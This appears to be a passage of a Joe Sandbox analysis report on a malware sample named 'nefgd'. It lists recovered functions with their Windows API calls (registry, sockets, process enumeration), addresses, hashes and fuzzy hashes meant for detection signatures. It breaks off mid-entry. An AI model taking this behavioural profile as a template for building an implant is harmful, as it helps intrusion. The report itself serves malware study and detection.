Opcode Fuzzy Hash: 047d2cca42c58713aad042b8e14d5d6945ad0af0a4292a2ddb48fb674c69a253
Instruction Fuzzy Hash: F2217A71509380AFD722CB55CC44B96BFF8EF46610F08889AE985CB692D324E858CBA1

Function 0612207A Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0612211F

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 7624193eedbc631a0380372d8892bffabc1ba99a463935af4fb24ce4a4bdd91c
Instruction ID: 143fd45895bd4d55b17c4d2feef07c9197cfa0d6aa68489d139e37ccf1d16015
Opcode Fuzzy Hash: 7624193eedbc631a0380372d8892bffabc1ba99a463935af4fb24ce4a4bdd91c
Instruction Fuzzy Hash: BC21F1B2100205AFFB31DF60CC84FAAF7ACEF04714F04485AFA488B680D375A5498BB5

Function 061216B4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 0612174D

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 6755a3d4a3efa03a6172be7ccc7e81bd5ac8ff796e5c012fe6c5b9d54033d0ac
Instruction ID: cadc263d03d597b766487ca16f4dd770b3ea45e964d39d0b7dd12adfc0364da5
Opcode Fuzzy Hash: 6755a3d4a3efa03a6172be7ccc7e81bd5ac8ff796e5c012fe6c5b9d54033d0ac
Instruction Fuzzy Hash: 2721A5754093846FE7128B10DC45FA6BFB8EF46214F0884DAE9448F553D365A90DC771

Function 061218AE Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06121958

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 4116e9ed442a165dd6ea632418cbe9e936535a497ab2510449bf7b9ef8fc51e2
Instruction ID: a267bdf5ae4e4bc659f9fb00c2d024d1b5859da8fe514da624a71e71696b140f
Opcode Fuzzy Hash: 4116e9ed442a165dd6ea632418cbe9e936535a497ab2510449bf7b9ef8fc51e2
Instruction Fuzzy Hash: 4E31F5714083846FEB22CF50CC44FA6FFB8EF46314F08899AE9859B552D324A509C7B1

Function 061227AD Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0612283E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 97ef662300ac86dd8e7fba154aefafcaa945763c23bd6236bef6f7c24d2572e7
Instruction ID: 29f8a77e405fc196445ca829f897ed88b8085705b3a919aa78edd0cc6a63f71a
Opcode Fuzzy Hash: 97ef662300ac86dd8e7fba154aefafcaa945763c23bd6236bef6f7c24d2572e7
Instruction Fuzzy Hash: CF2194715093856FD711CB51DC44FAABFB8EF46210F08849AE945CB552D374E948CBB1

Function 061228A4 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameW.KERNEL32(?,00000E24,?,?), ref: 0612294A

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 51f2f357eb31455c4f7c913a1ccb8e792a473628245055975fc1317b1355969c
Instruction ID: 51a1a733567d289dd965a8b670189fd49ee34215faf333dbe34479c5c6c4b916
Opcode Fuzzy Hash: 51f2f357eb31455c4f7c913a1ccb8e792a473628245055975fc1317b1355969c
Instruction Fuzzy Hash: 9921DD7150D3C06FD312CB65CC55B66BFB8EF87210F0984CBE8848B6A3C624A919C7B2

Function 061226C1 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0612274E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 61aca090a90faa774d91c01235ce853db84b9ef9ecbfd3358e85ad7b3fcb968e
Instruction ID: 9f4cc4c9c8b2e66e8e72bb3b9be2ae46fd3bfd40d6f6c7c99723d1221ded9eef
Opcode Fuzzy Hash: 61aca090a90faa774d91c01235ce853db84b9ef9ecbfd3358e85ad7b3fcb968e
Instruction Fuzzy Hash: 1C21E2725093806FE712CF60CC44B96BFB8EF06320F08849AE984CF5A2C364A948C7B5

Function 06120257 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 061202FA

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0dbcefe218d1573f569f6899591e8e1eae0cc6aa0a7280e6f34ff276e544dbaf
Instruction ID: 7031289b69b3ac1570717f6eae7f18fb7c4367ab5e1e4e3054c875b62636f6b9
Opcode Fuzzy Hash: 0dbcefe218d1573f569f6899591e8e1eae0cc6aa0a7280e6f34ff276e544dbaf
Instruction Fuzzy Hash: 7321A77550E3C06FD3138B258C51B62BFB4EF47614F0981CBE8849B693D225A91AD7B2

Function 0612447F Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06124504

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: b02f68b6b8f9d9b9b79c7fd928678ddd73d36d0ea21b1d6a70fd703415ee0731
Instruction ID: d706be04e65a602fa6839e7c299d9982af1037fc565ae722deaedef53a1c40ce
Opcode Fuzzy Hash: b02f68b6b8f9d9b9b79c7fd928678ddd73d36d0ea21b1d6a70fd703415ee0731
Instruction Fuzzy Hash: 0421D3715093806FD712CF50CC45F9ABFA8EF46224F08849AE984CF592C364A849C7A5

Function 06121156 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 061211D3

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a73edbd5ad5deaefb66d3d05d4b58ee21506440b514e86be0335040a28e597de
Instruction ID: 14c0c5253d157fd51df68eb05135171139f746d1b6f2dde35908b3f88b582a46
Opcode Fuzzy Hash: a73edbd5ad5deaefb66d3d05d4b58ee21506440b514e86be0335040a28e597de
Instruction Fuzzy Hash: 8821B272504205AFEB21DF60DC45FABBBECEF04214F04886AEA45CBA51D371E5598BA1

Function 0174BE78 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0174BF0D

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 591e784599f7fc3a3ab146cbec34ec007b7890f4c0d6414323d393fcfb298386
Instruction ID: dfdd2dfc4195e112ba7f1986a2bc82817dad71e081d1852caeec49fff9c81f5f
Opcode Fuzzy Hash: 591e784599f7fc3a3ab146cbec34ec007b7890f4c0d6414323d393fcfb298386
Instruction Fuzzy Hash: AA2128B54097806FD7138B259C40BA2BFBCEF47720F0881D6E9848B693D364A90DC775

Function 06123C1F Relevance: 1.6, APIs: 1, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06123CA6

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: ccb0c8abf96363d6a86bf57368217257da1ab576dfd6ba50ad5ccef805afa322
Instruction ID: 908d0f30a03687526660f442a1b59276e1e2b29765cded06f2329a6c183fef72
Opcode Fuzzy Hash: ccb0c8abf96363d6a86bf57368217257da1ab576dfd6ba50ad5ccef805afa322
Instruction Fuzzy Hash: E621B071508380AFE711CF60DC44FA6FFB8EF06320F08849BE9858B652C365A859CB75

Function 06120E64 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06120EF8

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 8f3f04724062e1b1f2f492c493456c49b3535a61352824883debd121184ddf98
Instruction ID: 85fdb1f040b3252207a75ae263c0e12682ad88c5d2dbe21a363e06af85a6d559
Opcode Fuzzy Hash: 8f3f04724062e1b1f2f492c493456c49b3535a61352824883debd121184ddf98
Instruction Fuzzy Hash: EC213AB14043846FE711CF50DC41FA6BFA8FF46324F0484AAE9848F592D374A909CBB5

Function 06124C9C Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E24,?,?), ref: 06124D42

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 9b66430f175ed99074d3b7cc0f5214db5a6d7957053ccd5f544d10d560db4ad4
Instruction ID: ac35d26725efc315b88b4db025a8757cb3e8c5bc95f18e67a4eefb6c89819ec3
Opcode Fuzzy Hash: 9b66430f175ed99074d3b7cc0f5214db5a6d7957053ccd5f544d10d560db4ad4
Instruction Fuzzy Hash: 77216D7550E3C06FC3138B758C65A15BFB4EF87610F1D81CFD8848B6A3D225A91AC7A2

Function 061209D6 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 06120A61

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 24862d6b6f8f74d7c366c892bd7627dd354d81099b21faea90a814bb35d2938f
Instruction ID: 24e7adbc78de7d2bb4cf1fc22d4d27c0bd2461729f46000cd29543874714a631
Opcode Fuzzy Hash: 24862d6b6f8f74d7c366c892bd7627dd354d81099b21faea90a814bb35d2938f
Instruction Fuzzy Hash: 342191B15093806FE711CB65CC45F66FFE8EF05210F08899AE9858B692D375E809CB76

Function 061217DA Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 06121859

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 354337bb3ba360fe8bb4b26d5fcf34ac6a151fad5e21459a4438accb0b0fd2bf
Instruction ID: e9c50be3ea53f883459870b5ce89cfe06483751b05dea527512da17663559f79
Opcode Fuzzy Hash: 354337bb3ba360fe8bb4b26d5fcf34ac6a151fad5e21459a4438accb0b0fd2bf
Instruction Fuzzy Hash: 5421AF72904204BFEB21DF51DC85FABBBECEF04214F04896AEA45CB651D734E4198AB1

Function 06122F34 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06122FB8

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 0b6a24d4fa532697851e9fb73cb96d47117ecb556a4810800d620e8d6be752f9
Instruction ID: 92b4f3fc989c0c835b1f96ae829ffe6b896d5b0d62f4ec40a8297c425f2db76c
Opcode Fuzzy Hash: 0b6a24d4fa532697851e9fb73cb96d47117ecb556a4810800d620e8d6be752f9
Instruction Fuzzy Hash: A921D3715093806FD712CB60DC44FA6FFB8EF46220F0884DAE984CF692C368A948C7A5

Function 06120846 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 061208B7

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: eb53ed2cdd0134163f0f2e84cfbef686de4683dd41e0f0e6f64bcdc0b79f3010
Instruction ID: 3c426c0f2ed056cfd3ca4a1b42dffb50be7a05402a0ac72089143a81bcc08faf
Opcode Fuzzy Hash: eb53ed2cdd0134163f0f2e84cfbef686de4683dd41e0f0e6f64bcdc0b79f3010
Instruction Fuzzy Hash: CC21C272900245AFEB20DF64DC44FABFBACEF04714F04856AE945CB641D364E4598BA1

Function 061264FD Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,796C6D5E,00000000,?,?,?,?,?,?,?,?,6CAA3C58), ref: 0612658C

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b1c9c8a616fb61dfcd5ad01daf50d3873bbcb45b0fcff513175027e84564f632
Instruction ID: 526d4d27f64bc9f29f61f351c42f965e656a75b100c699d85614a4aef29a7e0b
Opcode Fuzzy Hash: b1c9c8a616fb61dfcd5ad01daf50d3873bbcb45b0fcff513175027e84564f632
Instruction Fuzzy Hash: D121577140E3C09FDB138B748C65691BFB4EF03210F0E84DBD8848F1A3D269A849DB62

Function 0174B420 Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E24), ref: 0174B4BB

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d6fdc52315ac8ae7751b46e5e6fd848a09d64494767a9f888be10d8972d40150
Instruction ID: 0ad079b7da5c7b8c297d7d2392f3fbb8bc34e3f77bb56e467745beb39621e6c5
Opcode Fuzzy Hash: d6fdc52315ac8ae7751b46e5e6fd848a09d64494767a9f888be10d8972d40150
Instruction Fuzzy Hash: 0D21C5710093806FE722CF55CC45BA6FFB8EF06724F0880DAE9849F592C365A949CB75

Function 0174BDA2 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0174BE21

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b8198994d74ca09239cac7e7e27666c26aba0e7f12abace0dd1e025732641850
Instruction ID: 342003613ae382ccb471c11d62d3fe7d53976246ea7cf1ba402ed673c0d07ba4
Opcode Fuzzy Hash: b8198994d74ca09239cac7e7e27666c26aba0e7f12abace0dd1e025732641850
Instruction Fuzzy Hash: 0A21B271504244AFEB21CF65CC44B66FBE8EF08314F0484A9EA458B652D371E819CB76

Function 0174B606 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0174B685

Memory Dump Source

Source File: 00000003.00000002.4463046790.000000000174A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_174a000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c7b05ad241f37dca62243020033c1ce4e3cbb4ad4c45dbe6ce050d8a90b05bf3
Instruction ID: ace2e8c584da3ff475864025c0257f60840db5283b0ffb11e1c23f33cce3e685
Opcode Fuzzy Hash: c7b05ad241f37dca62243020033c1ce4e3cbb4ad4c45dbe6ce050d8a90b05bf3
Instruction Fuzzy Hash: 0121F072504244EFE721DF55CC84FABFBECEF08314F04845AEA448BA52D320E90C8AB6

Function 0612222A Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061222B9

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: dbb5534f1fa1d2f9844bc4f796a6c23f2aba6dfcf49df358e58e63bbb2de73f5
Instruction ID: 1fdd3492113b219971271835caaa80025b12594bd3dbfb740344080354ac34d4
Opcode Fuzzy Hash: dbb5534f1fa1d2f9844bc4f796a6c23f2aba6dfcf49df358e58e63bbb2de73f5
Instruction Fuzzy Hash: E421D3714093806FD7228B51CC44FA6FFB8EF06310F0885CBE9848B5A3C325A909CBB6

Function 06123EA0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

select.WS2_32(?,?,?,?,?), ref: 06123F24

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 16a14f33bdc0ebccba1548ec52625af5a9340539af6e65eb5f1f328694066776
Instruction ID: add844d3f29a8e3a4498862084bb7c70ff0faa85fb67eaaf0100b447db44b4bd
Opcode Fuzzy Hash: 16a14f33bdc0ebccba1548ec52625af5a9340539af6e65eb5f1f328694066776
Instruction Fuzzy Hash: C3217C715083859FD721CF15D844A52FFF8EF06220F08859AE988CB662D365E858CB62

Function 0612151A Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 0612159E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: e0fb94c071f9150fedf656155f71bb5726ea06e58d0404e7da829f06e979db42
Instruction ID: ecc9910894f607f0c477c49e3a8a9f35c67367e8aeb168ef26f685ff9d6b60a7
Opcode Fuzzy Hash: e0fb94c071f9150fedf656155f71bb5726ea06e58d0404e7da829f06e979db42
Instruction Fuzzy Hash: 6F2180B14093846FD722CB51CC84F97FBACEF46224F08849BE9459B652D324E509CBB5

Function 061219DA Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 06121A4E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 151e8415d4e5ad8a53d9534c1ebf7c9fc51fad5e50755d9e81e091f4717e51d3
Instruction ID: a396f881a1b40118cb4143628ef23830f483f6b7d8d0cb7cb644e6931f3347bb
Opcode Fuzzy Hash: 151e8415d4e5ad8a53d9534c1ebf7c9fc51fad5e50755d9e81e091f4717e51d3
Instruction Fuzzy Hash: A721DE72504244AFEB20DF50DC41FBAFBACEF04210F04886AEE458B651D330E85D8AB1

Function 06123D06 Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06123D8E

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 29fe543b3a14224f4b8a2b92eb94a3d44405c32c67728fca025a462bf2f9ab10
Instruction ID: b57e12322663a08727777a5b88bf35f80c1d6796ad3f2dd03e86d5df7635d8be
Opcode Fuzzy Hash: 29fe543b3a14224f4b8a2b92eb94a3d44405c32c67728fca025a462bf2f9ab10
Instruction Fuzzy Hash: 5621B071508384AFD721CF50DC44FA6FFB8EF46314F08859AE9849B552C365A409CBB5

Function 0612135A Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 061213D5

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: a9508e09df4c302feb5756fbaf2d7f925910cab7e56f9b7e4f0cdb8adbae7bf6
Instruction ID: 9c2424be5653be34923e02cb07247d5f6d37cecc9ff6c699301a364696011e97
Opcode Fuzzy Hash: a9508e09df4c302feb5756fbaf2d7f925910cab7e56f9b7e4f0cdb8adbae7bf6
Instruction Fuzzy Hash: F1219D71500644AFEB21CF51CC41FA6FBE8FF04624F04856AEE458BA51D331E458CBB1

Function 06120D9A Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 06120E0D

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 1030a93114c83e10aeb27085bd79ddc0f12cd8ea94e5aab655601700e243bd69
Instruction ID: 78ef319d97787382960fb1a181bc8c70cb1d3319647af1e09300043de400ff07
Opcode Fuzzy Hash: 1030a93114c83e10aeb27085bd79ddc0f12cd8ea94e5aab655601700e243bd69
Instruction Fuzzy Hash: 4B2104B1504244AFE720CF25DD45BAAFBE8EF08214F04886AED48CB741D371F459CA76

Function 061215E8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06121677

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: ff38bec517604d47fb48a63e45b6e9d05e1178a8abf70796162ca1b3c8d9131c
Instruction ID: 5e99215807118519d548683064aa0cb3e49c4cc3c81e82a8bfcb0f5c4fe26597
Opcode Fuzzy Hash: ff38bec517604d47fb48a63e45b6e9d05e1178a8abf70796162ca1b3c8d9131c
Instruction Fuzzy Hash: 3021B0B14093C46FD7228B11DC45FA6FFB8EF46314F08849AE9848B693D365A909CBB5

Function 061200E2 Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06120161

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 748b4f0a82779130b244a4d436431e949084bc75b2c2fb14ca0b6ee1dacffc8b
Instruction ID: 237eaf3295db38e541d8c7cab269146ecea56993033ab5cb94641f552cfbfac4
Opcode Fuzzy Hash: 748b4f0a82779130b244a4d436431e949084bc75b2c2fb14ca0b6ee1dacffc8b
Instruction Fuzzy Hash: B0219F71409384AFDB22CF51DC44F96FFB8EF45224F08859AE9858B552C325A448CBB6

Function 06124E9A Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,796C6D5E,00000000,00000000,00000000,00000000), ref: 06124F0C

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bb93fb97b667b7c643fd13dd4d969bc806dff0db159434f999dbac431705ec06
Instruction ID: 4b140b6ac34190f5fe45c0770d374fd1a7142b5b519eef828716d9801d10da5a
Opcode Fuzzy Hash: bb93fb97b667b7c643fd13dd4d969bc806dff0db159434f999dbac431705ec06
Instruction Fuzzy Hash: 2721C075604204AFE721CF55CC40FA7BBECEF44620F04896AED458B651D774E418CAB1

Function 061222F6 Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0612237A

Memory Dump Source

Source File: 00000003.00000002.4513491987.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6120000_nefgd.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: ba5338655ec9e9dd27d4295eeb197fad11d22736a8ceb156b27d52ff47bbe865
